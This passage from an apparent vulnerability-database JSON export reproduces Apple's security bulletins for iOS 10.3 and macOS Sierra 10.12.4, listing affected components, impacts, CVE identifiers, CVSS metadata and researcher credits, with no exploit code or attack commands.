may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2394: Apple\n\nCVE-2017-2396: Apple\n\nCVE-2016-9642: Gustavo Grieco\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and 
later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2395: Apple\n\nCVE-2017-2454: Ivan Fratric of Google Project Zero, Zheng Huang of the Baidu Security Lab working with Trend Micro's Zero Day Initiative\n\nCVE-2017-2455: Ivan Fratric of Google Project Zero\n\nCVE-2017-2457: lokihardt of Google Project Zero\n\nCVE-2017-2459: Ivan Fratric of Google Project Zero\n\nCVE-2017-2460: Ivan Fratric of Google Project Zero\n\nCVE-2017-2464: Jeonghoon Shin, Natalie Silvanovich of Google Project Zero\n\nCVE-2017-2465: Zheng Huang and Wei Yuan of Baidu Security Lab\n\nCVE-2017-2466: Ivan Fratric of Google Project Zero\n\nCVE-2017-2468: lokihardt of Google Project Zero\n\nCVE-2017-2469: lokihardt of Google Project Zero\n\nCVE-2017-2470: lokihardt of Google Project Zero\n\nCVE-2017-2476: Ivan Fratric of Google Project Zero\n\nCVE-2017-2481: 0011 working with Trend Micro's Zero Day Initiative\n\nEntry updated June 20, 2017\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed through improved memory handling.\n\nCVE-2017-2415: Kai Kang of Tencent's Xuanwu Lab (tencent.com)\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to unexpectedly unenforced Content Security Policy\n\nDescription: An access issue existed in Content Security Policy. 
This issue was addressed through improved access restrictions.\n\nCVE-2017-2419: Nicolai Gr\u00f8dum of Cisco Systems\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to high memory consumption\n\nDescription: An uncontrolled resource consumption issue was addressed through improved regex processing.\n\nCVE-2016-9643: Gustavo Grieco\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may result in the disclosure of process memory\n\nDescription: An information disclosure issue existed in the processing of OpenGL shaders. This issue was addressed through improved memory management.\n\nCVE-2017-2424: Paul Thomson (using the GLFuzz tool) of the Multicore Programming Group, Imperial College London\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2433: Apple\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: Multiple validation issues existed in the handling of page loading. This issue was addressed through improved logic.\n\nCVE-2017-2364: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A malicious website may exfiltrate data cross-origin\n\nDescription: A validation issue existed in the handling of page loading. 
This issue was addressed through improved logic.\n\nCVE-2017-2367: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue existed in the handling of frame objects. This issue was addressed with improved state management.\n\nCVE-2017-2445: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A logic issue existed in the handling of strict mode functions. This issue was addressed with improved state management.\n\nCVE-2017-2446: Natalie Silvanovich of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Visiting a maliciously crafted website may compromise user information\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2447: Natalie Silvanovich of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2463: Kai Kang (4B5F5F4B) of Tencent's Xuanwu Lab (tencent.com) working with Trend Micro's Zero Day Initiative\n\nEntry added March 28, 2017\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved 
memory management.\n\nCVE-2017-2471: Ivan Fratric of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue existed in frame handling. This issue was addressed through improved state management.\n\nCVE-2017-2475: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. This issue was addressed through improved validation.\n\nCVE-2017-2479: lokihardt of Google Project Zero\n\nEntry added March 28, 2017\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. This issue was addressed through improved validation.\n\nCVE-2017-2480: lokihardt of Google Project Zero\n\nCVE-2017-2493: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n\n**WebKit JavaScript Bindings**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: Multiple validation issues existed in the handling of page loading. 
This issue was addressed through improved logic.\n\nCVE-2017-2442: lokihardt of Google Project Zero\n\n**WebKit Web Inspector**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Closing a window while paused in the debugger may lead to unexpected application termination\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2377: Vicki Pfau\n\n**WebKit Web Inspector**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2405: Apple\n\n\n\n## Additional recognition\n\n**XNU**\n\nWe would like to acknowledge Lufeng Li of Qihoo 360 Vulcan Team for their assistance.\n\n**WebKit**\n\nWe would like to acknowledge Yosuke HASEGAWA of Secure Sky Technology Inc. 
for their assistance.\n\n**Safari**\n\nWe would like to acknowledge Flyin9 (ZhenHui Lee) for their assistance.\n\n**Settings**\n\nWe would like to acknowledge Adi Sharabani and Yair Amit of Skycure for their assistance.\n", "edition": 3, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-08-01T06:52:17", "title": "About the security content of iOS 10.3 - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2452", "CVE-2017-2423", "CVE-2017-2430", "CVE-2016-9643", "CVE-2017-2486", "CVE-2017-2389", "CVE-2017-2479", "CVE-2017-2397", "CVE-2017-2399", "CVE-2017-2461", "CVE-2017-2384", "CVE-2017-2434", "CVE-2017-2480", "CVE-2017-2450", "CVE-2017-2442", "CVE-2017-2492", "CVE-2017-2412", "CVE-2017-2395", "CVE-2017-6976", "CVE-2016-3619", "CVE-2017-2441", "CVE-2017-2444", "CVE-2017-2435", "CVE-2017-2439", "CVE-2017-2447", "CVE-2017-2433", "CVE-2017-2459", "CVE-2017-2379", "CVE-2017-2454", "CVE-2017-2428", "CVE-2017-2380", "CVE-2017-2471", "CVE-2017-2483", "CVE-2017-2456", "CVE-2017-2485", "CVE-2017-2455", "CVE-2017-2470", "CVE-2017-2469", "CVE-2017-2464", 
"CVE-2017-2396", "CVE-2017-2451", "CVE-2017-2400", "CVE-2017-2465", "CVE-2017-2406", "CVE-2017-2474", "CVE-2017-2446", "CVE-2017-2405", "CVE-2017-2472", "CVE-2017-2475", "CVE-2017-2468", "CVE-2017-2378", "CVE-2017-2390", "CVE-2017-2417", "CVE-2017-2376", "CVE-2017-2462", "CVE-2017-2487", "CVE-2017-2419", "CVE-2017-2491", "CVE-2017-2377", "CVE-2017-5029", "CVE-2017-2482", "CVE-2017-2466", "CVE-2017-2458", "CVE-2017-2364", "CVE-2017-2448", "CVE-2017-2401", "CVE-2017-2481", "CVE-2017-2453", "CVE-2017-2467", "CVE-2016-9642", "CVE-2017-2404", "CVE-2017-2415", "CVE-2017-2490", "CVE-2017-2484", "CVE-2017-2407", "CVE-2017-2473", "CVE-2017-2424", "CVE-2017-2416", "CVE-2017-2394", "CVE-2017-2457", "CVE-2017-2393", "CVE-2017-2367", "CVE-2017-2386", "CVE-2017-2414", "CVE-2017-2460", "CVE-2017-2463", "CVE-2017-2493", "CVE-2017-2445", "CVE-2017-2398", "CVE-2017-2440", "CVE-2017-2476", "CVE-2017-2432", "CVE-2017-2478"], "modified": "2017-08-01T06:52:17", "id": "APPLE:HT207617", "href": "https://support.apple.com/kb/HT207617", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:42:24", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. 
You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## macOS Sierra 10.12.4, Security Update 2017-001 El Capitan, and Security Update 2017-001 Yosemite\n\nReleased March 27, 2017\n\n**apache**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A remote attacker may be able to cause a denial of service\n\nDescription: Multiple issues existed in Apache before 2.4.25. These were addressed by updating Apache to version 2.4.25.\n\nCVE-2016-0736\n\nCVE-2016-2161\n\nCVE-2016-5387\n\nCVE-2016-8740\n\nCVE-2016-8743\n\nEntry updated March 28, 2017\n\n**apache_mod_php**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Multiple issues existed in PHP before 5.6.30\n\nDescription: Multiple issues existed in PHP before 5.6.30. These were addressed by updating PHP to version 5.6.30.\n\nCVE-2016-10158\n\nCVE-2016-10159\n\nCVE-2016-10160\n\nCVE-2016-10161\n\nCVE-2016-9935\n\n**AppleGraphicsPowerManagement**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A race condition was addressed through improved memory handling.\n\nCVE-2017-2421: @cocoahuke\n\n**AppleRAID**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2438: sss and Axis of 360Nirvanteam\n\n**Audio**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2430: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\nCVE-2017-2462: an anonymous 
researcher working with Trend Micro\u2019s Zero Day Initiative\n\n**Bluetooth**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2420: Pekka Oikarainen, Matias Karhumaa and Marko Laakso of Synopsys Software Integrity Group\n\n**Bluetooth**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2427: Axis and sss of Qihoo 360 Nirvan Team\n\n**Bluetooth**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2449: sss and Axis from 360NirvanTeam\n\n**Carbon**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted .dfont file may lead to arbitrary code execution\n\nDescription: A buffer overflow existed in the handling of font files. This issue was addressed through improved bounds checking.\n\nCVE-2017-2379: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department, John Villamil, Doyensec\n\n**CoreGraphics**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted image may lead to a denial of service\n\nDescription: An infinite recursion was addressed through improved state management.\n\nCVE-2017-2417: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**CoreMedia**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted .mov file may lead to arbitrary code execution\n\nDescription: A memory corruption issue existed in the handling of .mov files. 
This issue was addressed through improved memory management.\n\nCVE-2017-2431: kimyok of Tencent Security Platform Department\n\n**CoreText**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2435: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2450: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted text message may lead to application denial of service\n\nDescription: A resource exhaustion issue was addressed through improved input validation.\n\nCVE-2017-2461: Isaac Archambault of IDAoADI, an anonymous researcher\n\n**curl**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Maliciously crafted user input to libcurl API may allow arbitrary code execution\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2016-9586: Daniel Stenberg of Mozilla\n\n**EFI**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious Thunderbolt adapter may be able to recover the FileVault 2 encryption password\n\nDescription: An issue existed in the handling of DMA. This issue was addressed by enabling VT-d in EFI.\n\nCVE-2016-7585: Ulf Frisk (@UlfFrisk)\n\n**FinderKit**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Permissions may unexpectedly reset when sending links\n\nDescription: A permission issue existed in the handling of the Send Link feature of iCloud Sharing. 
This issue was addressed through improved permission controls.\n\nCVE-2017-2429: Raymond Wong DO of Arnot Ogden Medical Center\n\nEntry updated August 23, 2017\n\n**FontParser**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2487: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\nCVE-2017-2406: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Parsing a maliciously crafted font file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2407: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2439: John Villamil, Doyensec\n\n**FontParser**\n\nAvailable for: OS X El Capitan v10.11.6 and OS X Yosemite v10.10.5\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution \n\nDescription: A buffer overflow existed in the handling of font files. This issue was addressed through improved bounds checking.\n\nCVE-2016-4688: Simon Huang of Alipay company\n\nEntry added April 11, 2017\n\n**HTTPProtocol**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious HTTP/2 server may be able to cause undefined behavior\n\nDescription: Multiple issues existed in nghttp2 before 1.17.0. 
These were addressed by updating nghttp2 to version 1.17.0.\n\nCVE-2017-2428\n\nEntry updated March 28, 2017\n\n**Hypervisor**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Applications using the Hypervisor framework may unexpectedly leak the CR8 control register between guest and host\n\nDescription: An information leakage issue was addressed through improved state management.\n\nCVE-2017-2418: Alex Fishman and Izik Eidus of Veertu Inc.\n\n**iBooks**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Parsing a maliciously crafted iBooks file may lead to local file disclosure\n\nDescription: An information leak existed in the handling of file URLs. This issue was addressed through improved URL handling.\n\nCVE-2017-2426: Craig Arendt of Stratum Security, Jun Kokatsu (@shhnjk)\n\n**ImageIO**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2416: Qidan He (\u4f55\u6dc7\u4e39, @flanker_hqd) of KeenLab, Tencent\n\n**ImageIO**\n\nAvailable for: macOS Sierra 10.12.3, OS X El Capitan v10.11.6, and OS X Yosemite v10.10.5\n\nImpact: Viewing a maliciously crafted JPEG file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2432: an anonymous researcher working with Trend Micro's Zero Day Initiative\n\n**ImageIO**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2467\n\n**ImageIO**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted image may lead to unexpected application termination\n\nDescription: An out-of-bounds read existed in LibTIFF versions before 4.0.7. 
This was addressed by updating LibTIFF in ImageIO to version 4.0.7.\n\nCVE-2016-3619\n\n**Intel Graphics Driver**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with kernel privileges \n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2443: Ian Beer of Google Project Zero\n\n**Intel Graphics Driver**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to disclose kernel memory\n\nDescription: A validation issue was addressed through improved input sanitization.\n\nCVE-2017-2489: Ian Beer of Google Project Zero\n\nEntry added March 31, 2017\n\n**IOATAFamily**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2408: Yangkang (@dnpushme) of Qihoo360 Qex Team\n\n**IOFireWireAVC**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2436: Orr A, IBM Security\n\n**IOFireWireAVC**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A local attacker may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2437: Benjamin Gnahm (@mitp0sh) of Blue Frost Security\n\n**IOFireWireFamily**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to cause a denial of service\n\nDescription: A null pointer dereference was addressed through improved input validation.\n\nCVE-2017-2388: Brandon Azad, an anonymous researcher\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with kernel 
privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2398: Lufeng Li of Qihoo 360 Vulcan Team\n\nCVE-2017-2401: Lufeng Li of Qihoo 360 Vulcan Team\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: An input validation issue existed in the kernel. This issue was addressed through improved input validation.\n\nCVE-2017-2410: Apple\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An integer overflow was addressed through improved input validation.\n\nCVE-2017-2440: an anonymous researcher\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with root privileges\n\nDescription: A race condition was addressed through improved memory handling.\n\nCVE-2017-2456: lokihardt of Google Project Zero\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2472: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2473: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An off-by-one issue was addressed through improved bounds checking.\n\nCVE-2017-2474: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute 
arbitrary code with kernel privileges\n\nDescription: A race condition was addressed through improved locking.\n\nCVE-2017-2478: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A buffer overflow issue was addressed through improved memory handling.\n\nCVE-2017-2482: Ian Beer of Google Project Zero\n\nCVE-2017-2483: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2490: Ian Beer of Google Project Zero, The UK's National Cyber Security Centre (NCSC)\n\nEntry added March 31, 2017\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: The screen may unexpectedly remain unlocked when the lid is closed\n\nDescription: An insufficient locking issue was addressed with improved state management.\n\nCVE-2017-7070: Ed McKenzie\n\nEntry added August 10, 2017\n\n**Keyboards**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2458: Shashank (@cyberboyIndia)\n\n**Keychain**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An attacker who is able to intercept TLS connections may be able to read secrets protected by iCloud Keychain.\n\nDescription: In certain circumstances, iCloud Keychain failed to validate the authenticity of OTR packets. 
This issue was addressed through improved validation.\n\nCVE-2017-2448: Alex Radocea of Longterm Security, Inc.\n\nEntry updated March 30, 2017\n\n**libarchive**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A local attacker may be able to change file system permissions on arbitrary directories\n\nDescription: A validation issue existed in the handling of symlinks. This issue was addressed through improved validation of symlinks.\n\nCVE-2017-2390: Omer Medan of enSilo Ltd\n\n**libc++abi**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Demangling a malicious C++ application may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2441\n\n**LibreSSL**\n\nAvailable for: macOS Sierra 10.12.3 and OS X El Capitan v10.11.6\n\nImpact: A local user may be able to leak sensitive user information\n\nDescription: A timing side channel allowed an attacker to recover keys. This issue was addressed by introducing constant time computation.\n\nCVE-2016-7056: Cesar Pereida Garc\u00eda and Billy Brumley (Tampere University of Technology)\n\n**libxslt**\n\nAvailable for: OS X El Capitan v10.11.6\n\nImpact: Multiple vulnerabilities in libxslt\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2477\n\nEntry added March 30, 2017\n\n**libxslt**\n\nAvailable for: macOS Sierra 10.12.3, OS X El Capitan v10.11.6, and Yosemite v10.10.5\n\nImpact: Multiple vulnerabilities in libxslt\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-5029: Holger Fuhrmannek\n\nEntry added March 28, 2017\n\n**MCX Client**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Removing a configuration profile with multiple payloads may not remove Active Directory certificate trust\n\nDescription: An issue existed in profile uninstallation. 
This issue was addressed through improved cleanup.\n\nCVE-2017-2402: an anonymous researcher\n\n**Menus**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to disclose process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2409: Sergey Bylokhov\n\n**Multi-Touch**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2422: @cocoahuke\n\n**OpenSSH**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Multiple issues in OpenSSH\n\nDescription: Multiple issues existed in OpenSSH before version 7.4. These were addressed by updating OpenSSH to version 7.4.\n\nCVE-2016-10009\n\nCVE-2016-10010\n\nCVE-2016-10011\n\nCVE-2016-10012\n\n**OpenSSL**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A local user may be able to leak sensitive user information\n\nDescription: A timing side channel issue was addressed by using constant time computation.\n\nCVE-2016-7056: Cesar Pereida Garc\u00eda and Billy Brumley (Tampere University of Technology)\n\n**Printing**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Clicking a malicious IPP(S) link may lead to arbitrary code execution\n\nDescription: An uncontrolled format string issue was addressed through improved input validation.\n\nCVE-2017-2403: beist of GrayHash\n\n**python**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing maliciously crafted zip archives with Python may lead to arbitrary code execution\n\nDescription: A memory corruption issue existed in the handling of zip archives. 
This issue was addressed through improved input validation.\n\nCVE-2016-5636\n\n**QuickTime**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Viewing a maliciously crafted media file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue existed in QuickTime. This issue was addressed through improved memory handling.\n\nCVE-2017-2413: Simon Huang (@HuangShaomang) and pjf of IceSword Lab of Qihoo 360\n\n**Security**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Validating empty signatures with SecKeyRawVerify() may unexpectedly succeed\n\nDescription: A validation issue existed with cryptographic API calls. This issue was addressed through improved parameter validation.\n\nCVE-2017-2423: an anonymous researcher\n\n**Security**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with root privileges\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2451: Alex Radocea of Longterm Security, Inc.\n\n**Security**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted x509 certificate may lead to arbitrary code execution\n\nDescription: A memory corruption issue existed in the parsing of certificates. This issue was addressed through improved input validation.\n\nCVE-2017-2485: Aleksandar Nikolic of Cisco Talos\n\n**SecurityFoundation**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted certificate may lead to arbitrary code execution\n\nDescription: A double free issue was addressed through improved memory management.\n\nCVE-2017-2425: kimyok of Tencent Security Platform Department\n\n**sudo**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A user in a group named \"admin\" on a network directory server may be able to unexpectedly escalate privileges using sudo\n\nDescription: An access issue existed in sudo. 
